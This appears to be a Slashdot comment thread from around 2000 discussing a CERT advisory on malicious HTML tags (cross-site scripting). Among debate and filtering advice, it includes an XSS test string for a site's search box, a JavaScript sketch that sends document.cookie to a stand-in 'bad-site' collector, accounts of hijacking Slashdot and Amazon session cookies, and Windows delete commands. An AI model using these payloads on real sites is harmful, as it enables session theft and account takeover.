    I'm suprise to see this coming up now of all times. I think there's too many people out there who recently bought web site in a box kits and are only now realizing the ramifications. So if your wondering why this needs to be stated at all, imagine a general public -- without a clue. Yes indeed Bob, your holding a gun in your hand, and oh by the way -- the gun barrel that's the end pointed at your shoe :)

  70. Re:This is really nothing new by Anonymous Coward · · Score: 0

    Geos Info!!!

    -A Friend of Spankey

  71. Software industry is pathetic by Anonymous Coward · · Score: 0

    It's hard to believe how clueless software developers are. Don't any of you people ever think anything through before implementing it? How can all of these products be so flimsy? It's incredible.

  72. dumb moderators again by Anonymous Coward · · Score: 0

    promiscous web browsing -> safe web browsing

  73. Re:Maliciousness by Anonymous Coward · · Score: 0

    Although you may stumble into it randomly from no-such.com, formerly known as hell.com .

  74. Re:What a stupid problem! by Anonymous Coward · · Score: 0

    If you're using a Win32 you could try Proxomitron. It's a client-side proxy that filters HTML as you browse. You can create text matching rules to selectively filter HTML tags or JavaScript commands.

  75. Re:Let's design a... by Anonymous Coward · · Score: 0
    Other people have suggested adding something to the browser to block this. You would have something like this:

    <SCRIPT OFF="234778750897928374375882834234">
    insert user-submitted HTML here
    <SCRIPT>evilcode;</SCRIPT>
    <SCRIPT ON="234778750897928374375882834234">

    The first tag would turn scripting off, so "evilcode" wouldn't execute. The last tag would turn it back on. That long numeric code (a random string) is needed so the malicious code can't do a command, as it could not predict the code.

    The problem with this is that it would not protect people using older browsers, so the server would need to do filtering anyway. The same thing would happen with a program like you describe - the program would only be able to recognize user-submitted code it the server enclosed it in special tags, and then it may as well do the filtering.

    Someone needs to come up with a solution that is backwards-compatible. What would happen if the server included some purposely invalid Javascript code before any user-submitted information (something that causes an error, like referring to an invalid object). Would the browser disable scripting upon seeing the invalid code? That would prevent it from running the malicious code, if this worked.

  76. Re:attn: coders by Anonymous Coward · · Score: 0

    Try http://www.junkbusters.com It lets you block servers (like annoying banner ads), not to mention their sites. And yes, it's available for Linux too :)

  77. Re:Promiscuous Browsing? by Anonymous Coward · · Score: 0

    So you hate spelling and grammar Nazis...how about style Nazis (and I mean writing style). Your comment, while correctly spelled (allowing for jargon terms like "pr0n" and "Webspy") and grammatically correct (mostly; the second sentence should really not begin with "or"), could be written beter. Let me rewrite your comment in a more standard style...

    Does not engaging in promiscous browsing mean not using Dug Song's Webspy program? Or does it mean not looking at all this pr0n? I'm so confused.

  78. Re:Needed: Accessible JScript on/off Control by Anonymous Coward · · Score: 0

    It's Javascript, not Jscript.

  79. Re:Maliciousness by Anonymous Coward · · Score: 0
    How much can you really do with some "evil" Javascript

    The worst you can do is really bog down someone's computer to the point of locking it up. Dude, just go visit some cheap ass porn sites. You'll see what I mean.

  80. Re:No defense against careless clicking. by Anonymous Coward · · Score: 0

    Hmm, trusted and untrusted zones. That's an IE feature that a certain open-source browser needs to copy.

  81. You are right! by Anonymous Coward · · Score: 0

    %60%66%76%73%78%75%62%60FONT size=+3%62YOU ARE RIGHT!%60/Font%62%60/Blink%62

  82. Where are you from ? by siva06 · · Score: 0

    Boy are you new to the Universe ????

    Did you not know that Freedom is the basic rule of the Society ?

    Cracking and Virus is illegal, sure but at the same no one is talking about monopolizing and cornering the market.

    Anyway you surely have not understood /., here we are purely for expressing our freedom such the giving you the freedom to post what you want.

    I guess you should be able to appreciate it for having be allowed to post such a blatent general misconceived idea of your .....

    Grow up kid !@##$@!@#

  83. This has always been a problem for sloppy coding by funkman · · Score: 0
    For example see how many on line chat applications/bulletin boards you can add this to:

  84. Re:This has always been a problem for sloppy codin by funkman · · Score: 0
    Oops, from preview to submit my greater/less than signs got translated in the comment area. Here is the fun HTML to add inside of guest books, etc:

    <IMG SRC="http://barneyonline.com/images/bab4.gif">

  85. PHP has a great solution by TheInternet · · Score: 0



    As Ross Perot would say, problem solved.

    - Scott
    ------
    Scott Stevenson

    --
    Scott Stevenson
    Tree House Ideas
  86. I was bit by embedded SCRIPT in HTML by pvolt · · Score: 0

    If anyone doubted that this was a problem ... I got bit by Chester K

  87. test by nerdling · · Score: 0

    test.. this will be more clear in a sec ;0

    --
    [w00t@freaky.bish]# rm .signature
  88. woohoo by nerdling · · Score: 0

    alert("afsjdfsdfklj! slashtod version .069 :)")"> Click here for more info on this thingy There once was a man from nantucket... (irrevelant weewee joke)

    --
    [w00t@freaky.bish]# rm .signature
  89. Turing revisited by Anonymous Coward · · Score: 1

    Let M be a Turing machine.

    M1(g(M)) =
    + if M stops with input g(M)
    - if M does not stop with input g(M)

    Modify M1 into Turing machine M2 as such:

    M2(g(M)) =
    undefined if M1(M) = + ie M stops with input g(M)
    + if M1(M) = - ie M does not stop with input g(M)

    Does M2 stop with input g(M2)? Yes, simply extend your right index finger, place it over the small projection inside the depression labeled "reset" in the central processing unit of the Turing machine and exert gentle forward motion with the index finger. Lift your right index finger from the depression and place it into your nostril.

    QED.

  90. Re:Interesting and valid security hole by Anonymous Coward · · Score: 1

    If you don't do some sanity checks, you're bound to get burned. I know I've written a lot of things that don't check for this, even though the thought had crossed my mind a number of times.

    This is just further proof that JavaScript is evil. It's capable of doing some really nifty things, all at the expense of safety and security.

    Because I use Internet Exploiter at work, I can reject JavaScript, cookies, and Java by default, and selectively enable them on a site-per-site basis (or with wildcards, like *.hotmail.msn.com) simply by going to Tools > Add to Trusted Zone. It makes Superbad fun, and GeoCities bearable.

    Is Mozilla going match this feature, or are they going to continue doing their own thing, and ignore what makes other sofware good?

  91. client-side proxies by Anonymous Coward · · Score: 1
    in the past, i've used a program (on windoze) that was basically a client-side proxy which allowed regexps to be run against the html coming in as well as headers going in and out.

    basically, set the browser proxy to localhost and everything gets sent through this program sitting in the system tray. it even allows configuration for use of multiple proxies which can be switched between with a few clicks.

    the version i've got came pre-configured for a whole bunch of java-script related stuff (all with great names...):
    • Banner Blaster
    • OnUnload unloader
    • Embeded MIDI Silencer
    • Kill all Popup Windows
    • etc.
    it says that it would always be available @ http://proxomitron.cjb.net
  92. The tension on the Web . . . by Anonymous Coward · · Score: 1

    There is actually a very simple tension here. When web designers ask me how to create a secure site, I tell them the simple answer: replace CGI functionality with Java and JavaScript, make pages static wherever possible, and serve on the likes of Dan Bernstein's publicfile. (Surf on over! Take a look! Best thing since qmail!) This will practically guarantee that the website won't be defaced. (Serve static pages exclusively from an unpriviledged chroot environment on a read-only fs? Turn off all other services? Go ahead! Make my day!) Then when web users come and ask me how to secure their browsing, I can tell them that I really don't trust Java, JavaScript, et. al. for lots of reasons like are mentioned in the CERT advisory. Well, at least *I* never use Java/Javascript! Web designers are going to continue to watch out for their own skins and try to prevent their sites from being defaced. A secure website is one that doesn't get defaced. If that means manipulating user data as little as possible to prevent the likes of buffer-overflows, so be it. Web designers will always face more pressure to try to keep their sites from getting cracked than for input validation; this advisory will just end up by and large ticking users off; what will webmasters do? So naive users will continue to lose. What we really need is to get back to making some real open (like RFC) standards for the new applications that are served across the web and write separate, *secure* clients and servers, rather than try to backdoor everything across the web. And we need to improve the basic HTML language to be expressive enough to handle real documents without needing sprucing up. (Amaya is leading the way here.) And as for the javascript crud? I'm not missing it. Sorry.

  93. Old Hat by Anonymous Coward · · Score: 1

    I thought one of the cardinal rules of web design was to NEVER trust any input comming from the net... EVER!

  94. CERT ADVISORY ALERT RELEASED TODAY URGENT URGENT by Anonymous Coward · · Score: 1

    USERS WHO DO NOT PASSWORD PROTECT THEIR ACCOUNTS ARE LEAVING THEIR ACCOUNT OPEN TO PEOPLE WHO MIGHT DO BAD THINGS WITH IT. WE HAVE DISCOVERED BAD PEOPLE OUT THERE WHO WOULD DO SUCH THINGS SO PLEASE BE CAREFUL.

  95. Re: DO NOT FOLLOW THIS by Anonymous Coward · · Score: 1

    The worst thing is: It even works though I *have* switched off JavaScript (Netscape Communicator 4.5 on Sun something), because it is in an URL...

  96. The fud machine at work by Anonymous Coward · · Score: 1

    How lame can you get? I'm giving up. I'll tell everyone I know that microsoft is the answer.. only THEY can protect us from our imaginations. My god, look what happens when people have the ability to do things without supervision! Save me Bill!

  97. What bothers me... by Adam+Schumacher · · Score: 1

    ... is that this "exploit", if that's what you want to call it, has been known for a while. I recall some HTML tags being embedded in the feedback form on Microsoft's Win2K test site, that redirected surfers to RedHat's website. This was several months ago, and I'm sure people have been doing this kind of thing since time immemorial. And CERT is only posting an advisory now?

    Makes you wonder...

    - Adam Schumacher
    cybershoe@mindless.com
    ICQ UIN: 10222694

  98. Re:Maliciousness by gavinhall · · Score: 1

    Posted by cookieman.k:

    Hi! If you deltree c:\windows then format.exe wich is in c:\windows\command won't run. So there must be something between the two commands.

  99. Re:Interesting and valid security hole by The+Man · · Score: 1
    Should, should, should. I've yet to hear someone use the word in conjunction with computers and not get burned or be made to look foolish. Yeah, well, we should all lead perfect idyllic lives knocking back cocktails on our favorite beaches. Since this isn't fantasy-land, you've got to assume the worst. The successful candidate will:

    • Assume that every single user out there is dumb as a rock, or possibly dumber, and will never pay even the slightest attention to his/her browsing.
    • Assume that every single cracker is clever as hell, has access to any and every possible piece of equipment, exploit, and tool in existence.
    • Follow the principle of robustness: be liberal in what you accept and conservative in what you produce. In this case, that means accepting input that can/will cause harm and handling it appropriately.

    This isn't news to most programmers. Sure, some of the attacks mentioned are fairly clever, but the principles have been around since the beginning: find input that causes the program to behave in an undefined way, and hope that it can't tell the difference. My guess is that most programmers already check for this kind of crap - as in fact you point out from your own experience.

    The thing that's always fascinated me about this sort of thing is how anyone can have so much free time and brain power to waste coming up with this garbage. Hello, don't you losers have anything better to do???

  100. Re:Equivalent Advisory circa 1998 by The+Man · · Score: 1

    Well, it's only been 14 months, then. That's pretty good for CERT.

  101. Helloooooo . . . tag !! by LoCoPuff · · Score: 1

    Come on this is NOT BIG NEWS . . . This is been around for the longest time . . . I think there was a time when Slashdot reported a news article about some Lego Mindstorm code thing . . and apparently the article came from Yahoo!, but in essence it was a query to Yahoo! and imported a page from another page using the tag . . I think this was reported to BugTraq and they were like "Oh, that's nothing not a problem" so . . Oh well . . I guess if it doesn't come from cDc (Cult of the Dead Cow) then it's not worth looking at . . .

  102. Read this post, I dare you. by pb · · Score: 1

    Malicious code

    Oh no, Slashdot is vulnerable! No one is safe from the dreaded CERT Advisory Exploits! :)
    ---
    pb Reply or e-mail; don't vaguely moderate.

    --
    pb Reply or e-mail; don't vaguely moderate.
  103. Re:Works in Slashdot by bhurt · · Score: 1

    Just out of curiosity: how many people looked at the page source of that script before running it? (I did).

  104. www.cert.org is down by Nethead · · Score: 1

    All I get is a "Not Found"... Did we slashdot CERF?

    --
    -- I have a private email server in my basement.
  105. First malicious HTML tag... by krynos · · Score: 1

    was called BLINK.

  106. Re:Works in Slashdot by copito · · Score: 1

    Wow.
    --

    --
    "L'IT c'est moi!"
  107. Re:what a joke by kdoherty · · Score: 1

    Except the advisory isn't talking about any actual bugs, it's talking about sites which take un-verified input and use it to produce HTML pages. It has nothing to do with browsers not being 100% rock solid. The browser can't tell the difference between JavaScript that's part of a comment on a messageboard and JavaScript that's in the header bits the server puts on.

    That said, it's still a dumbass advisory ;)
    --
    Kevin Doherty
    kdoherty+slashdot@jurai.net

    --
    Kevin Doherty
    kdoherty+slashdot@jurai.net
  108. Nope, you're not the only one. People are lazy. by Colin+Smith · · Score: 1

    Or maybe stupid. I don't really understand it. I think they developers don't actually read any of the Perl books. Validating that user input is what you actually think it should be is *basic* security.

    Maybe they are ASP developers.

    --
    Deleted
  109. Re:Put whatever controls you want into Mozilla by Jaeger · · Score: 1

    There's one problem with that: I'm not the world's greatest C hacker. I can think about it, but I don't have the skill or the time necessary to get that skill to add that feature. Therefore, I think about the features and occassionally suggest it to others, those who have the capability and the resources to do it. I would love to have the time and ability to hack my own private copy of Mozilla, but I don't.

  110. Antibookmarks with Junkbuster by Pseudonymus+Bosch · · Score: 1

    You can set ~antibookmarks~ if you are using the antibanner GPL proxy Junkbuster.

    Simply set in sblock.ini (regular expressions allowed) which sites must be blocked.
    --

    --
    __
    Men with no respect for life must never be allowed to control the ultimate instruments of death.
    GW Bu
  111. Waste by pudge · · Score: 1

    Doesn't CERT have anything better to do?

    Perhaps a better CERT advisory would be "people who don't check data from untrusted sources should not be allowed to program (or breed ;-)."

  112. Re:Interesting and valid security hole by lyric · · Score: 1

    I've been off checking our site, and a few others, for this vulnerability. /. suffers from it, in any case. Just enter

    "><script>alert("sucky");</script><

    into the search box. As other have commented, this is dangerous because that bit of JS can access all the DOM and any other content on a page - perhaps including user passwords and stuff.

  113. Simple solution by Cereal+Box · · Score: 1

    Don't allow HTML tags -- period! Strip out ALL greater-than and less-than signs and replace them with (ampersand)gt; and (ampersand)lt;. If you absolutely must have tags, create your own custom tags (say, for instance, LINK("http://slashdot.org")) and let the CGI convert them to real HTML tags. And, if you're dealing with a link tag or some sort of tag where a URL is required, strip out question marks and "javascript" from the URL.

  114. Re:Needed: Accessible JScript on/off Control by lithis · · Score: 1

    the ie powertoys comes with a utility to turn images on and off quickly, so it may be easy to do the same for jscript.

    to clear your documents window, just create a batch file with the single line
    echo y | del c:\windows\recent\*.*
    (in windows nt, use
    del /q c:\winnt\profiles\\recent\*.*
    )

  115. this is not just a javascript issue by Marc+Slemko · · Score: 1

    This is important to note: this is not just a javascript issue. You can exploit this in various other ways, such as form tags, etc. Yes, it is harder and perhaps less rewarding. Disabling javascript does avoid much of the risk. But it is important not to think that this is a problem with javascript in particular.

  116. Re:Pointing fingers at the wrong people. by Marc+Slemko · · Score: 1

    You are missing the issue. The issue is that this is not necessarily malicious code, but that this hole allows you to break through the partitioning between sites.

    For example, one site should never be able to see cookies set by another site. By exploiting this hole, you can do things like this.

    Yes, I have seen an example last week from (some big company) on one of the websites' front pages. Follow a link, and it sets a cookie that replaces the content on the front page with something else, persistently, until you delete the cookie. This was a real life example.

  117. Re:Where's the insecurity? by Marc+Slemko · · Score: 1

    Do you ever do anything on the web that you would like to be private or restricted and not completely exposed to the world?

    If not, you have no problem.

    If you do things like online banking, shopping, etc. where your proof of identity matters or where there are real world implications, this could impact you.

  118. Re:Works in Slashdot by Marc+Slemko · · Score: 1

    Even if slashdot filtered javascript: links (which are one of the things I mentioned in the Apache docs about htis issue), it would still be vulnerable. Remember, _ANY_ page on the server that doesn't properly encode output makes you vulnerable. In this case, an easy one is the default 404 page. Many webservers (well, most from what I have seen) do not properly filter URLs output on 404 pages. Apache did, but it didn't set an explicit charset so it was still vulnerable in some situations.

  119. Re:A possible partial solution? by Marc+Slemko · · Score: 1

    That would break a lot of valid things. Likely, on most sites, enough to make it worthless. In addition, filtering those characters is not always enough.

    I have thought about possible fixes a lot over the past week. I haven't come up with anything that works too well yet other than simply having the developer make sure all their output is properly encodeded, where "properly" may be yet to be defined.

  120. Re:So how do we secure this? by Marc+Slemko · · Score: 1

    Well, then the cookie should contain the encrypted password. You can get the username (and all other personal info) just by accessing slashdot with that cookie.

    Note that it isn't entering the URL that is the problem. I could enter a "normal" URL that redirects you to the same place. The problem here is that slashdot's 404 page doesn't encode the requested resource's name before outputting it. The only role that my posting the message with the link in served was the delivery method. There is no resaon for that to be slashdot itself, other than a lot of the people reading slashdot have accounts.

    All you need is a single such page on a server, and a way to convince or force a user to follow an arbitrary link (and that is really pretty easy) and away you go.

    As the advisory says, filter filter filter or encode encode encode. Unfortunately, it isn't as easy as it should be to do this properly.

  121. Re:Duh? by Marc+Slemko · · Score: 1

    One of the reasons so few people understand it is because they assume they know all the issues. Trust me, you almost certainly don't. Don't just read the title or the first paragraph of the advisory.

    Read the full thing. The real issue is not obvious to most people until they have gone through it a few times and understand what it says. Read the info on the Apache site. Read the info from MS when it comes out. Understand it. Then come back and say this is the same thing as not filtering SSIs in guestbooks.

  122. Re:this will steal your slashdot cookies by Marc+Slemko · · Score: 1

    The only reason that "notthere" is used for slashdot is because it goes to a 404 error page that includes the name of the document without encoding it. If this is done using SSIs, then applying the Apache patch on the Apache site will fix this by defaulting to entifying all SSI echo commands.

    If you had a server with an older version of the Apache printenv, you could use /cgi-bin/printenv instead because it didn't properly encode its output.

    etc. This is a site dependent thing.

  123. Re:Ok, Chester, I'll play your games by Marc+Slemko · · Score: 1

    The cookie contains everything you need to access slashdot as that user. It doesn't matter if you have their password if you can access the site as them.

    It looks to be a userid and a crypt()ed password or something. But the details don't matter.

    There is a problem with the change password feature on slashdot though; it should require you to enter your existing password. The way it is now, a user that has stolen your cookie can use it to change your password to something they know. No, not a huge difference between changing the password and just accessing the site as you, but...

  124. Re:but roxen isn't by Marc+Slemko · · Score: 1

    "if a server isn't vulnerable, how can you say it is?"

    Well gee, probably because the statement that it isn't vulnerable is wrong. Why do you have any reason to think that Roxen magically avoids this problem by properly encoding things or stipping out HTML in every case? Why do you think there are no bugs in it?

    And if you read the thread or the advisory, you would see that the vulnerability has nothing to do with "allowing people to post HTML tags in guestbooks". That is ancient news, although the problem is still amazingly common.

    Here is one very easy to find example: the most obvious example

  125. Re:Doesn't this tie in to JP's 'hack' last year? by Marc+Slemko · · Score: 1

    If you think this is the same issue as a site having modified content on it because it mirrored another site that had modified content posted then you obviously read neither the advisory or the posts here.

    Please don't post stupid comments without having any clue about what the facts are. Obviously the advisory is nothing new to people who don't read it or who don't understand what they read.

  126. Re:A possible partial solution? by Marc+Slemko · · Score: 1

    Good idea. Unfortunately, it isn't so easy to implement. There are lots of ways to disguise this stuff and lots of valid things that could be caught so I really don't think it would work well. Feel free to prove me wrong...

    I really don't think there is any magic bullet that the web server software can use to deal with this. Wish there was.

  127. Re:Does Amazons "one click shopping" fall under th by Marc+Slemko · · Score: 1

    No, that is the whole point of this problem. I can give you a link that, if you click on it (or even just read a HTML mail message with an IMG SRC pointing to it) will send me your amazon cookies and all the information I need to access amazon as you. I tried this the other week. It works. This is why the issue is news. It is not a simple issue to understand the implications of.

    If you don't have one click shopping enabled, then they would still need your password. Someone can probably can modify the page you see to grab it if you follow a specially fomatted link to amazon.

    Sure, in this case they can only buy books for you and there is still the physical delivery aspect stopping a true theft. But this is the sort of thing that this hole exposes.

  128. Re:Duh? by coreman · · Score: 1

    Everyone seems to be forgetting the most malicious tag of all... (blink)!(/blink)

  129. Hello message board. by Mooset · · Score: 1
    Hello message board. This is a message.
    <SCRIPT>malicious code</SCRIPT>
    This is the end of my message.

    TEE HEE!

  130. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  131. Re:"Promiscuous Browsing" by Sloppy · · Score: 1

    Browsing the Internet with Javascript, ActiveX, Java, or anything like that enabled.

    By default, you should not execute code on your box, if that code came from someone else (e.g. a web site, an email, etc), unless you examine the code first. That's just common sense.


    ---
    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  132. Doh by Roofus · · Score: 1


    Your right. I had forgotten about that! Well good thing that all web sites are "open source" then :)

    And i use the term VERY loosely!

  133. "Promiscuous Browsing" by JohnFred · · Score: 1


    What on earth is "Promiscuous Browsing"? Given the magnitude of the problem, is this not a euphumism for "dont browse at all"? Eeek. No more Slashdot :-(

    John Fred.

    --
    /usr/games/fortune > ~/.signature
    1. Re:"Promiscuous Browsing" by Xofer+D · · Score: 1

      By default, you should not execute code on your box, if that code came from someone else (e.g. a web site, an email, etc), unless you examine the code first. That's just common sense.

      That's right! I never execute any code on my precious Windows machine unless I've examined... the... oh, wait. Never mind.

      --
      The Signal/Noise ratio can be improved in two ways. Remaining silent is the OTHER way.
  134. Wow!!! This is beautiful!!! by Jeld · · Score: 1

    Now, the first one was fairly good. It even caught a few of ( probably ) younger or less experienced /. community members. But this one is a masterpiece! I have never before seen a troll ( IF it is a troll, of which fact I am about 80-90% sure ) that would look so delightfuly genuine. If I had any moderatoin points I would put all my moderation points on this one, but would still set it to "flamebait" or "troll"

    --

    Everybody Lies. But it doesn't matter since nobody listens.

  135. Or for a quick fix... by mattbee · · Score: 1

    $user_input =~ s/|([^|])*|/ /gs;

    You have to replace the | characters with a less-than, and two greater-than signs respectively because Slashdot strips 'em out :-) But that'll take any HTML out of user's comments. If users to be able to post links, why not just scan for URLs and put anchor tags around then?

    But then I thought we all knew browser-side scripting was inherently insecure...? Why has CERT only just decided this is a problem worthy of their attention?

    --
    Matthew @ Bytemark Hosting
  136. Re:Interesting and valid security hole by Otto · · Score: 1
    This one really took me by surprise as a web developer.

    Not much of a web developer are you? :-)

    Just Kidding. Still, anyone who codes for the web should always remove ALL HTML tags, except for a predefined set, if deemed needed. That should be standard "web developer" knowledge.

    Just like on SlashDot here. See that line down below the submit button? It reads: "Allowed HTML

      • "

        All these tags are relatively safe tags. You can't post images, you can't post scripts, objects, embeds, forms, or other bad stuff.

        Now, you CAN make a link that runs a script when clicked on, within that set of tags, so it's not totally secure.. [a href='javascript:code here'] and so on.

        ---

    --
    - Give a man a fire and he's warm for a day, but set him on fire and he's warm for the rest of his life.
  137. Re:Interesting and valid security hole by Otto · · Score: 1

    Bloody hell. That's what I get for not previewing.

    Here's the unmangled post:

    This one really took me by surprise as a web developer.

    Not much of a web developer are you? :-)

    Just Kidding. Still, anyone who codes for the web should always remove ALL HTML tags, except for a predefined set, if deemed needed. That should be standard "web developer" knowledge.

    Just like on SlashDot here. See that line down below the submit button? It reads: "Allowed HTML [B> [I> [P> [A> [LI> [OL> [UL> [EM> [BR> [TT> [STRONG> [BLOCKQUOTE> [DIV .*> [DIV> [P .*>"

    All these tags are relatively safe tags. You can't post images, you can't post scripts, objects, embeds, forms, or other bad stuff.

    Now, you CAN make a link that runs a script when clicked on, within that set of tags, so it's not totally secure.. [a href='javascript:code here'] and so on.

    ---

    --
    - Give a man a fire and he's warm for a day, but set him on fire and he's warm for the rest of his life.
  138. Re:Let's design a... by Shadowlion · · Score: 1

    *chuckle*

    Wow, that brings back memories of my CS classes... bad memories, unfortunately (the instructor was kind of a loser: he had a serious "child molestor" look about him, which wasn't helped by how often he brought in his toddler-aged daughter, and pawned off *all* of his work, including many class sessions, on his various overworked grad students).

  139. So why use the latest browsers? by MS · · Score: 1
    So we are advised to turn off Javascript, JScript, Java, ActiveX, Plugins, Cookies, (put-in-what-ever-you-like) when surfing the Net.

    But weren't all those extra thingies which were the reason we abandoned our outdated (put-here-some-browser-you-liked) and switched to MSIE?

    So Microsoft (among others) will advice us to not use the features they added to its browser to make us switch to its browser. So why should we ever switch and use MSIE?!?

    :-)
    ms

  140. WebWasher used to support this by 3trunk · · Score: 1

    It put an entry in the right click menu of your browser that would block this URL in future but this feature does not seem to be the current release (1.2.2)

    1. Re:WebWasher used to support this by palerider · · Score: 1

      webwasher 1.2.2 still does it, but you have to make sure that "Don't change netscape's context menu" is not checked in the options under preferences.

  141. Re:CERT Irresponsibility by winnetou · · Score: 1
    Frankly, I think this kind of notice is totally irresponsible on the part of CERT.

    I think it was irresponsible to wait as long with this advisory as CERT has done. The exploits have been known for years. When hotmail forced javascript down the throats of their customers, there was a huge uproar in news.admin.net-abuse.email, because spamfighters have learned the hard way that javascript can easily be abused. One of the threads started with 552549264 at deja.com.

    hotmail just requires javascript, it still works without it. Download the source of the simple form I wrote and try it yourself. My form may not look as flashy as the opening screen at hotmail, but it downloads a lot faster.

    The web doesn't need javascript, however marketroids love it, because it makes it easier to collect information.

  142. Re:Maliciousness by tatara · · Score: 1

    I *think* the worst that can happen is the snooping of cookies and othe request information from the site that's including the "bad script" back to the originator of the "bad script".

    Using that example, I think you could do something like the following (included script shown):

    var cookieStr = encodeCookies(document.cookie);
    var win = window.open("gotcha", "http://bad-site/grabdata.pl?"+cookieStr);

    And not just cookie data, but other request info. In general, I don't think this is a big problem, but I'm normally not nearly creative enough at seeing how things can be exploited.

  143. Hmmmmmmmmmmm (generic subject) by QuMa · · Score: 1

    First of all, I can't believe they're bringing this like it's something new. Hasn't this been always known, what with hotmail exploits on bugtraq every week?

    Secondly, why apache? Do they distribute scripts like messageboards or other vunerable stuuf?

  144. Re:Works in Slashdot by rueba · · Score: 1

    Damn!

    I feel violated....

    Damn cookies, sheesh....

    --
    The only reason all cover-ups appear to fail is that you never hear about the ones that succeed.
  145. Re:Mobile Code: Threat or Menace? by Crispin+Cowan · · Score: 1
    I think it does have to do with active content. The active content threat is that servers that allow anonymous users to post HTML code (such as this here Slashdot thingie :-) also enable attackers to post HTML that contains tags that point to malicious scripts.

    Thus a nefarious AC could post a slashdot comment that contains malicious tags, and just by surfing through here, your browser gets sacked.

    Now, Slashdot is not actually vulnerable to this threat, because slashdot has a short list of permitted tags, and all others are stripped. But a site that takes any kind of HTML input can become an attack script re-broadcaster for anyone silly enough to surf with Javascript enabled.

  146. Re:Am I missing something? by brogen · · Score: 1

    Add this line above the rest:

    $_ =~ s/%([\dA-F][\dA-F])/pack ("C", hex($1))/ige;

    Which would help with one of the problems /. has that was brought up on a previous thread, this decodes the URL encoded characters so that your swaps on > and < work all the time (ie, not subverted by passing in an encoded sequence).

    --
    unless ($Brogen) { $fixit = ''; }
  147. Re:What a stupid problem! by M1000 · · Score: 1

    This guy is right!

    Hey, The escape key in Mozilla doesnt work for banners...

    That's why I switched back to Netscape 4.6.

  148. Doesn't this tie in to JP's 'hack' last year? by primetyme · · Score: 1

    Didnt' feel like reposting..
    _____________

    Subject:
    [thelist] Re: [Admin] article alert - Malicious HTML tags
    Date:
    Wed, 02 Feb 2000 22:54:11 -0600

    Clueing thelist in on this one too..

    Does anyone else remember a good amount of time ago when John
    Vranesevich(JP)'s antionline site got 'hacked' because his site mirrored
    a site that someone included the exact same thing CERT is talking about
    here?

    Basically, the guy hacked the server that JP was mirroring and the
    content(some pics of his sister I think) came up on the antionline site,
    making it appear that JP got hacked.

    CERT hasn't exactly been on top of things for a couple years now, this
    is no different(its always been an issue that security minded people
    have known about for some time) just because it got posted on slashdot
    doesn't mean its breaking news :)

    Just my humble, anti-hype opinion :)

    .djc.

    rudy limeback wrote:
    >
    > >subject: Malicious HTML tags
    > >posted by:isaac
    > >date: {ts '2000-02-02 17:21:33'}
    > fabulous summary isaac
    > i had actually read the CERT article before i read yours

    ________________________________________________ _______
    unsubscribe+options: http://lists.evolt.org/mailman/listinfo/thelist
    tip harvester: http://lists.evolt.org/harvest/
    email archive: http://lists.evolt.org/archive/
    http://evolt.org/ Workers of the Web, evolt !

  149. Re:CERT Irresponsibility by Muffhead · · Score: 1

    I would suggest having a look through some of the recent Bugtraq archives. These can be found at SecurityFocus. Have a look at some of the problems found in IE lately. This is & has been a problem for a long time. Here's a Hotmail example. There are postings regarding similar problems with most of the web based email services. Active scripting causes more problems than javascript.

    It has been recommended that you disable all scripting for security reasons for a while now. It's very good practice.

  150. Re:Let's design a... by Rombuu · · Score: 1

    Yeah, I'll get to that after I finish up my program that determines if a given program terminates or not.

    --

    DrLunch.com The site that tells you what's for lunch!
  151. Re:well well well by FascDot+Killed+My+Pr · · Score: 1

    "It isn't a security flaw in cookies....It's a secruity flaw in the CGI...."

    Yes. And your point is?

    Tell me, when flu season comes around, do you get a vaccination? Why? The problem isn't that YOU have the flu, the problem is that OTHER PEOPLE have it. If only they'd cure themselves everyone would be better off.

    You see, online scripting will ALWAYS have security flaws--that's why I don't allow my online software (browsers, etc) to store information that I don't want to get out.
    --
    Java banners:
    Bad for users because Java kills Netscape

    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
  152. well well well by FascDot+Killed+My+Pr · · Score: 1

    "Recommended solutions include completely overhauling web sites, disabling cookies..."

    Huh, what do you know. Many of us have been laughed at for taking this very precaution.

    "Told ya so."
    --
    Java banners:
    Bad for users because Java kills Netscape

    --
    Linux MAPI Server!
    http://www.openone.com/software/MailOne/
    (Exchange Migration HOWTO coming soon)
    1. Re:well well well by Chester+K · · Score: 1

      Many of you are still laughed at for taking that very precaution.

      This vulnerability isn't anything new. It's been around since scripting was first implemented in a browser. It isn't a security flaw in cookies, or scripting. It's a security flaw in the CGI that is running on a particular site.

      I have the strange notion that whoever suggested such draconian methods of "alleviating the problem" (which they say has never actually been reported to them as a problem) is probably some closed-minded technophobic fool who's afraid to upgrade from Linux 1.0 because they are under the mindset "if you can't do it in Linux 1.0, is it worth doing?".

      --

      NO CARRIER
  153. Anonymity can cause irresponsibility by Webmonger · · Score: 1

    The danger in this kind of attack is that it provides anonymity for the perpetrator. Slashdot readers have seen what sort of stupid things people can do when they're anonymous, and some known exploits are pretty nasty.

  154. Re:Works in Slashdot by Webmonger · · Score: 1

    I like it!
    Hey, it's the first time ever I've gotten a comment moderated to 5. Let me have my momemt.

  155. Re:Works in Slashdot by Webmonger · · Score: 1

    Well, if I was evil, I'd have posted as Anonymous Coward.

  156. Re:attn: coders by Sinister+Stairs · · Score: 1
    Along with the idea of a "killfile" for domains, I've always wished I had more control over cookies as well. For example, I'd like to be able to "always accept cookies from slashdot.org" or "never accept cookies from doubleclick.net"

    I know Lynx has options like this, but AFAIK, they don't save from session to session. (And at any rate, I'd like to see this feature in Navigator, IE, etc.)

  157. Re:Works in Slashdot by tauzell · · Score: 1

    Developers should never include sensitve info in
    a cookie (although I don't care much about my slashdot id/password). If you have to I'd suggest
    encrypting it.

  158. Re:A possible partial solution? by ABadDog · · Score: 1

    I'm just guessing, but wouldn't a really strict filter that completely disallowed GET or POST requests with the strings "" in them (and possibly their %hex encodings (and possibly a few more characters) completely eliminate this?

    Admittedly, this is a drastic solution, more akin to an amputation of a limb than a band-aid. But if you don't need the limb, and it's got gangrene....

  159. Re:A possible partial solution? by ABadDog · · Score: 1

    Damnit, let me try again: "...wouldn't a really strict filter that disallowed GET or POST requests with the greater than or less than characters in them ..."

    (Since I can't quite figure out how to post naked angle brackets.)

  160. very good point (#2) by TheDullBlade · · Score: 1

    However, there's no need for your browser to trust slashdot, since you don't need JavaScript to use it.

    As for 1, you can anonymously create a web page almost as easily as you can post an anonymous message on slashdot.

    --
    /.
  161. You gotta know your limitations. by Tony-A · · Score: 1

